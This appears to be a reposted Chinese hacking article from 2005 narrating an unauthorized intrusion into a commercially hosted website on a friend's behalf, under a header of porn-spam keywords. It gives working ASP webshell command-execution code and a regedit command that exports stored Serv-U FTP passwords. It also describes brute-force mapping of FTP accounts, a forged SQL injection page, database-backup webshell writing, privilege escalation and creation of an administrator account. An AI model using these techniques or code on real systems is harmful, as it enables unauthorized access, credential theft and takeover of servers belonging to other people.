国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

打開(kāi)APP
userphoto
未登錄

開(kāi)通VIP,暢享免費(fèi)電子書等14項(xiàng)超值服

開(kāi)通VIP
萬(wàn)網(wǎng):我進(jìn)來(lái)玩過(guò)兩次了
萬(wàn)網(wǎng):我進(jìn)來(lái)玩過(guò)兩次了

文章作者:Andyower 天使娃娃
信息來(lái)源:邪惡八進(jìn)制信息安全團(tuán)隊(duì)(
www.eviloctal.com

注:本文已發(fā)表2005年9月的黑客防線.如有轉(zhuǎn)載,請(qǐng)注名

    近日,朋友說(shuō)要我?guī)退粋€(gè)站點(diǎn),說(shuō)那個(gè)站點(diǎn)有許多他想要的資料,他給出了站點(diǎn)www.***d.com,由于一些原因,所以本文有很多的截圖都不能提供,希望大家可以諒解.

第一次滲透
    先從主站入手,登陸上去看看,主站上面幾乎都是靜態(tài)的,只有一些新聞,而那些新聞是的注入點(diǎn)是連接到另外的一個(gè)IP,220.194.*.*/news.asp?id=111,試一下提交and 1=1,and 1=2,還有"news.asp?id=1‘11","news.asp?id=11;1","news.asp?id=11 1","news.asp?id=11--1",全部返回正常,也就是說(shuō)"‘",";","--"," ",已經(jīng)全部被過(guò)濾了,再去220.194.*.*去溜達(dá)一下,看見(jiàn)一個(gè)論壇,動(dòng)網(wǎng)的,是前幾天剛剛裝上去的,注冊(cè)人數(shù)不到50人,為了避免對(duì)方是騙人,把建站的日期修改,還是把最新的漏洞測(cè)試一下,都不能成功,想跨站?管理員就沒(méi)有上過(guò)論壇.
    這個(gè)時(shí)候,對(duì)www.***y.com掃描的報(bào)告出來(lái)了,開(kāi)放21,80,3389,試著ftp上去看看.返回了信息如下:

C:\Documents and Settings\Andyower>ftp www.***d.com
Connected to
www.tnbfriend.com.
220-Microsoft FTP for WinSock ready...
220 (歡迎您使用中國(guó)萬(wàn)網(wǎng)虛擬主機(jī)服務(wù),本空間禁止使用聊天室,江湖游戲,在線視頻播
放,專業(yè)下載等嚴(yán)重耗用服務(wù)器資源的程序,謝謝您的合作!)
User (
www.tnbfriend.com:(none)):

顯示的是"Microsoft FTP for WinSock ready",小樣的,"serv-u‘,你以為你換了馬甲我就不認(rèn)識(shí)你啊,原因是因?yàn)槌霈F(xiàn)了"220",一般來(lái)說(shuō),返回的信息有"220"的,就多半都是"serv-u"了.是萬(wàn)網(wǎng)的虛擬主機(jī),聽(tīng)說(shuō)萬(wàn)網(wǎng)的虛擬機(jī)被人搞過(guò)很多次了,不知道現(xiàn)在有沒(méi)有學(xué)乖點(diǎn)呢.先不管這個(gè),既然是虛擬主機(jī),就幾乎可以肯定的,一定可以旁注.
    打開(kāi)Domain3.5,設(shè)置好參數(shù),過(guò)了沒(méi)多久出來(lái)結(jié)果,上面捆綁了非常多的網(wǎng)站,看得我都不想看了,純粹屬于體力活,還好有天使娃娃在,這種事情就交給她吧.讓她隨便找到一個(gè)存在漏洞的網(wǎng)站,得到個(gè)webshell再說(shuō).(天使娃娃:為什么受傷的總是我......)
    不知道是因?yàn)樘焓雇尥薜拿眠€是人品好,才不到10分鐘,就拿下了一個(gè)年老失修的動(dòng)網(wǎng),并且把一句話木馬寫好了,就等著我去連接了.我比較喜歡海陽(yáng)頂端木馬,配合起一句話非常的好用。連接上去以后,看見(jiàn)了許多的站點(diǎn).如圖1:
隨便點(diǎn)擊一個(gè)進(jìn)去看看,發(fā)現(xiàn)沒(méi)有權(quán)限,也許是為每個(gè)用戶都提供了一個(gè)賬號(hào)吧.再看看其他的東西,發(fā)現(xiàn)不能執(zhí)行cmd,自己上傳了一個(gè)cmd.exe上去,發(fā)現(xiàn)還是不能執(zhí)行.因?yàn)楝F(xiàn)在我用的這個(gè)海洋不是最新的版本,所以沒(méi)有查看組件的功能,在沒(méi)有查看組件前,很多的東西都是不能確定的.這次,上傳了另外一個(gè)海洋,查看組件.如圖2:
最重要的2個(gè)組件可以用:Shell.Application ,WScript.Shell,也就是說(shuō)WScript.Shell被改名了,但是還是存在的,這種小事難不到偶滴,馬上弄了段代碼上去,內(nèi)容如下
<%
fpath = request("fpath")
if request("cmd")<>"" then
%>
<div align="center">
<ObjEct runat=sErvEr iD=Andyower scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8">
  </ObjEct>
<textarea readonly cols=80 rows=20>
<%=Andyower.exec(fpath & " /c "+request("cmd")).stdout.readall%>
</textarea>

提交 cmd.asp?fpath=自己的cmd.exe的路徑&cmd=命令.如圖3
現(xiàn)在已經(jīng)可以運(yùn)行cmd命令了,在這里我想說(shuō)一下,在組件探測(cè)的時(shí)候,探測(cè)到WScript.Shell不存在也有可能可以執(zhí)行命令的.在這補(bǔ)充一下,寫完這文章的時(shí)候,突然發(fā)現(xiàn),其實(shí)海洋就直接提供有這個(gè)功能了,只是我一直沒(méi)用到.只要在執(zhí)行Wscript.Shell的頁(yè)面,點(diǎn)擊使用Wscript.Shell,然后在下面的命令框下寫自己的cmd.exe的路徑寫上去,例:
"f:\usr\cn23002\bbs\UploadFile\2005-5\cmd.exe /c netstat -an",這個(gè)效果和我用的效果是一樣的.(在此感謝Lcx大哥提供那么好用的馬兒).
    在netstat -an的時(shí)候.有一條值得注意‘TCP   127.0.0.1:43958     0.0.0.0:0         LISTENING",和想象中的一樣,既然是這樣子,把早就準(zhǔn)備好了的serv-u本地提升權(quán)限的程序弄上去,試了幾個(gè)都不能成功,難道說(shuō)密碼改了?前面我已經(jīng)試過(guò)跳轉(zhuǎn)目錄,在"C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\"找到了serv-u的目錄,并且下載了快捷方式,得到路徑以后,嘗試跳到serv-u的目錄,已經(jīng)試過(guò)了,不能的跳轉(zhuǎn),做了限制.就這樣的放棄了?不能,當(dāng)然不能了,都做到這一步了,放棄了太可惜了.不知道大家記得不記得6月的黑防,下雨天[F.S.T]寫的那篇文章:"serv_u FTP 再暴本地權(quán)限提升漏洞",也許很多人沒(méi)有注意到吧,可能是因?yàn)橛X(jué)得局限性非常的小,但是,我可以告訴你們,成功率高達(dá)80%,為什么呢?因?yàn)楝F(xiàn)在的虛擬主機(jī)商都怕了serv-u本地權(quán)限提升漏洞,所以,他們很都的管理員都是把密碼存放在注冊(cè)表里面,也就是說(shuō),符合了下雨天文章所說(shuō)的要求,賬號(hào)和密碼存放在注冊(cè)表里面.不記得的讀者們請(qǐng)重新的翻開(kāi)書來(lái)看看吧.我也不想廢話那么多,直接看怎么實(shí)現(xiàn)的吧,在webshell那,執(zhí)行命令:regedit /e "C:\Documents and Settings\All Users\Documents\system.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\" ,就會(huì)把注冊(cè)表的中的serv-u的賬號(hào)密碼全部的導(dǎo)出到了C:\Documents and Settings\All Users\Documents\system.ini這個(gè)文件里面,當(dāng)然了前提是:C:\Documents and Settings\All Users\Documents\ 這個(gè)文件是可寫的,如果不能寫的話,自己換一個(gè)可以寫的目錄吧.然后下載system.ini文件,打開(kāi)一看!呆了!如圖4:
所有的人的賬號(hào)密碼都是明文的,在這里想說(shuō)一下,因?yàn)槲覀兊臋?quán)限是Guests的,所以是根本沒(méi)有權(quán)限往注冊(cè)表里面寫入一個(gè)管理員的賬號(hào)和密碼,而且為了證明自己的想法,偶也在本機(jī)測(cè)試過(guò),在Guests下,是沒(méi)有任何權(quán)限往注冊(cè)表修改或者是添加刪除的.很多的辦法都試過(guò)了,還是不行.跳轉(zhuǎn)到c:\winnt\下,非常多的KB*.log文件,這些都是補(bǔ)丁的日志,最新的一個(gè)補(bǔ)丁就是在昨天打的,也許是因?yàn)殚_(kāi)啟了windows自動(dòng)更新的功能,我猜想管理員才不會(huì)那么的勤快.
    現(xiàn)在我們已經(jīng)有了所有用戶的ftp賬號(hào)和密碼,關(guān)鍵就是找到ftp賬號(hào)密碼所對(duì)應(yīng)的網(wǎng)站了,但是他的網(wǎng)站的目錄都是按順序的,從目錄根本沒(méi)有辦法猜到哪個(gè)目錄對(duì)應(yīng)著哪個(gè)網(wǎng)站,400多個(gè)站點(diǎn)啊!一個(gè)個(gè)手工的測(cè)試的話,會(huì)讓人瘋掉的.我現(xiàn)在休息一下.體力活,讓天使娃娃來(lái)吧.(天使娃娃:為什么受傷的又是我......)至于在得到所有ftp賬號(hào)和密碼的情況下怎么知道哪個(gè)ftp對(duì)應(yīng)的是哪個(gè)網(wǎng)站,我也說(shuō)說(shuō)吧,先找出目標(biāo)網(wǎng)站的特殊一點(diǎn)的網(wǎng)頁(yè)名字,然后一個(gè)個(gè)賬號(hào)密碼的登陸,用ls命令來(lái)查看,是不是存在那個(gè)文件,如果不存在就下一個(gè),如果存在,還要再仔細(xì)的查看其他的文件,是不是都符合要求,存在不存在那個(gè)站點(diǎn)的其他的文件.暈了吧,沒(méi)事,實(shí)例說(shuō)明一切.
    先上www.***d.com網(wǎng)站,找?guī)讉€(gè)特殊的文件,在這里,我找到的是
http://www.***d.com/sqrd.htm,還有http://www.***d.com/yuq.htm.得到文件名,sqrd.htm還有yuq.htm,然后從cn23001這個(gè)賬號(hào)開(kāi)始,用得到的賬號(hào)和密碼登陸,登陸進(jìn)去以后,發(fā)現(xiàn)沒(méi)有sqrd.htm文件的就直接跳過(guò)去了,如果存在sqrd.htm文件,再看看有沒(méi)有yuq.htm文件.如果都存在,說(shuō)明很大可能就是這個(gè)ftp賬號(hào)了,對(duì)了,還忘記說(shuō)了一下,在system.ini文件里面,重要的就是2樣?xùn)|西.第一個(gè):[HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\\Domains\1\UserSettings\cn23017] ,賬號(hào)就是cn23017,第二:密碼就是在下面的"Password"=這里是密碼,一個(gè)個(gè)的慢慢試吧.我去睡覺(jué)了,累死了.
    一覺(jué)醒來(lái),天使娃娃很郁悶的對(duì)我說(shuō),還是沒(méi)有找到,他都試到了cn23217了,已經(jīng)累得不行了,上網(wǎng)查查有沒(méi)有相關(guān)的軟件,查不到,算了,還是我們偉大的領(lǐng)袖毛主席說(shuō)得好,自己動(dòng)手豐衣足食.自己寫一個(gè)程序來(lái)針對(duì)性的暴力破解吧.花了點(diǎn)時(shí)間把程序?qū)懞?程序界面如下圖5:
界面是難看了一點(diǎn),因?yàn)橼s時(shí)間嘛,寫個(gè)程序花了半個(gè)多小時(shí),再美化的話又要花幾個(gè)小時(shí)了,簡(jiǎn)直是浪費(fèi)時(shí)間.能用就可以啦.說(shuō)名一下,"ftp主機(jī)名"不用說(shuō)了吧.對(duì)方的ftp的地址,"特殊文件名"填寫的是要得到的ftp對(duì)應(yīng)的網(wǎng)站的特殊文件名,這個(gè)已經(jīng)在文章中說(shuō)名了的."從第幾個(gè)ftp賬號(hào)開(kāi)始...",這個(gè)地方,按照自己的要求來(lái)寫,因?yàn)榕荚跍y(cè)試的時(shí)候,有的時(shí)候讀取到100多個(gè),程序就掛了,如果重新開(kāi)始又太麻煩,所以就加上這個(gè)選項(xiàng),防止程序掛了以后,不用重新開(kāi)始讀取,默認(rèn)寫1就可以了,意思是從文件中的第一個(gè)ftp賬號(hào)開(kāi)始測(cè)試,其他的就不用寫啦,就等著賬號(hào)出來(lái)吧.還有一點(diǎn),因?yàn)闉榱斯?jié)約時(shí)間.我沒(méi)有用到多線程,所以就自動(dòng)跳出對(duì)話框來(lái)代替了多線程,防止程序死鎖.等下次有時(shí)間或者是有人覺(jué)得好用,我再完善吧.現(xiàn)在就這樣將就著先吧.下面是我的測(cè)試.如圖6:
我是從第4個(gè)賬號(hào)開(kāi)始讀取,當(dāng)?shù)顷懙膄tp下存在index.asp這個(gè)文件的時(shí)候,就會(huì)把賬號(hào)和密碼再列出來(lái),方便吧.到了這里也許會(huì)有人問(wèn),萬(wàn)一有幾個(gè)網(wǎng)站都存在著一樣的特殊文件名呢?呵呵,這個(gè)時(shí)候,就需要自己動(dòng)一下手啦,不能那么懶的.
    不到幾分鐘,已經(jīng)測(cè)試完了,其中的一個(gè)賬號(hào)存在著我寫的特殊的文件名,就他了.手工ftp進(jìn)去看看,完全就是這個(gè)站點(diǎn)了,小樣的,www.***d.com,你以為你躲著深我就找不到你了啊!哈哈!一樣讓你跑不掉!ls命令看看.發(fā)現(xiàn)一個(gè)conn.asp文件,打開(kāi)來(lái)看看,既然是另外一個(gè)主機(jī)的連接信息:
<%
dim conn  
dim connstr
connstr="provider=sqloledb;driver={SQL SERVER};server=220.194.*.*;uid=j****;pwd=d******;database=d*****;"
set conn=server.createobject("ADODB.CONNECTION")
conn.open connstr
%>

再次滲透

    這次萬(wàn)網(wǎng)害死人了吧!既然讓我得到了要進(jìn)攻的網(wǎng)站的另外一臺(tái)服務(wù)器.220.194.*.*,這臺(tái)服務(wù)器是獨(dú)立的,旁注過(guò),沒(méi)有成功,因?yàn)椴淮嬖诹硗獾木W(wǎng)站,這一次,看你往哪跑,一起把他拿下!因?yàn)橛行┰?從現(xiàn)在開(kāi)始不提供截圖了,希望可以諒解.既然已經(jīng)得到了數(shù)據(jù)庫(kù)的賬號(hào)密碼,而且他的網(wǎng)站是直接用asp連接上去的,這樣說(shuō),一定會(huì)開(kāi)了ms sql的端口的.用sql器連接上去,發(fā)現(xiàn)自己的權(quán)限是db_owner的權(quán)限,很多命令不能用,自己手工讀去對(duì)方的web路徑又太麻煩了,而且我也想看看他的結(jié)構(gòu),既然我有了sql賬號(hào)的密碼.他的服務(wù)器上沒(méi)有注入漏洞,我可以幫他偽造一個(gè),偽造一個(gè)注入點(diǎn),然后用nbsi來(lái)猜解其他的信息,速度會(huì)快很多的.
    偶馬上就在本地架設(shè)了一個(gè)IIS,然后把他的conn.asp文件弄到我的虛擬目錄下.再構(gòu)造一個(gè)存在注入點(diǎn)的文件a.asp,里面的admin表是存在的,代碼如下:
<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id   ‘如果沒(méi)有這個(gè)表,可以自己建立一個(gè)表和字段
rs.open strSQL,conn,1,3
rs.close
%>
完成了,就這么簡(jiǎn)單,其他的信息就讓他全部自己暴露出來(lái)吧.打開(kāi)nbsi,一頓狂注,什么信息都出來(lái)啦,慢慢的瀏覽著他的目錄,web目錄在d:\wwww,還裝了serv-u,這個(gè)服務(wù)器因?yàn)槭亲约旱?,所以不?huì)那么專業(yè)吧,應(yīng)該不會(huì)設(shè)什么防的.先得到webshell再說(shuō),db_owner的權(quán)限可以備份數(shù)據(jù)庫(kù),我用xiaolu的getwebshell.exe,備份數(shù)據(jù)庫(kù)文件到d:\www\1.asa,結(jié)果不能運(yùn)行!出錯(cuò)!原來(lái)該死的數(shù)據(jù)庫(kù)中存在<% 這個(gè)東西,沒(méi)辦法,運(yùn)氣一向不是很好,這次又是個(gè)很好的理由.慢慢的找到數(shù)據(jù)庫(kù)中看哪個(gè)字段存在<%的內(nèi)容,刪除!
    又花了半個(gè)小時(shí)找出來(lái)了,用SQL語(yǔ)句把他刪除,再備份,這次成功了.成功的拿到webshell,覺(jué)得不好看的,重新寫一個(gè)webshell進(jìn)去吧,接著就是serv-u提升權(quán)限,添加一個(gè)賬號(hào),設(shè)置成為管理員,3389登陸進(jìn)去,爽死了!什么都有了,把賬號(hào)密碼給朋友吧,他愛(ài)怎么搞是他的事情了,我的任務(wù)已經(jīng)完成.

注意:由于本文圖片為引用 為了避免圖片失效 上傳含圖pdf附件提供大家下載 歡迎使用adobe 生成PDF文件可以較好的保護(hù)您的版權(quán) 您可以同步發(fā)出含圖主題和PDF 不用擔(dān)心別人轉(zhuǎn)載文章刪除您的附加信息 因?yàn)檫€有PDF可以說(shuō)明一切



附件: ftp.rar (6 K) 下載次數(shù):256

附件: 萬(wàn)網(wǎng)我進(jìn)來(lái)玩過(guò)兩次了.rar (407 K) 下載次數(shù):243
本站僅提供存儲(chǔ)服務(wù),所有內(nèi)容均由用戶發(fā)布,如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請(qǐng)點(diǎn)擊舉報(bào)。
打開(kāi)APP,閱讀全文并永久保存 查看更多類似文章
猜你喜歡
類似文章
編寫數(shù)據(jù)庫(kù)操作類,使ASP.NET 中的數(shù)據(jù)庫(kù)操作變得簡(jiǎn)單
Asp與Access數(shù)據(jù)庫(kù)連接入門
Asp深度揭密(上)
C#執(zhí)行SQL事務(wù)用法實(shí)例
ASP+ACCESS SQL注射技巧小記
詳細(xì)講解小馬的免殺方法
更多類似文章 >>
生活服務(wù)
分享 收藏 導(dǎo)長(zhǎng)圖 關(guān)注 下載文章
綁定賬號(hào)成功
后續(xù)可登錄賬號(hào)暢享VIP特權(quán)!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服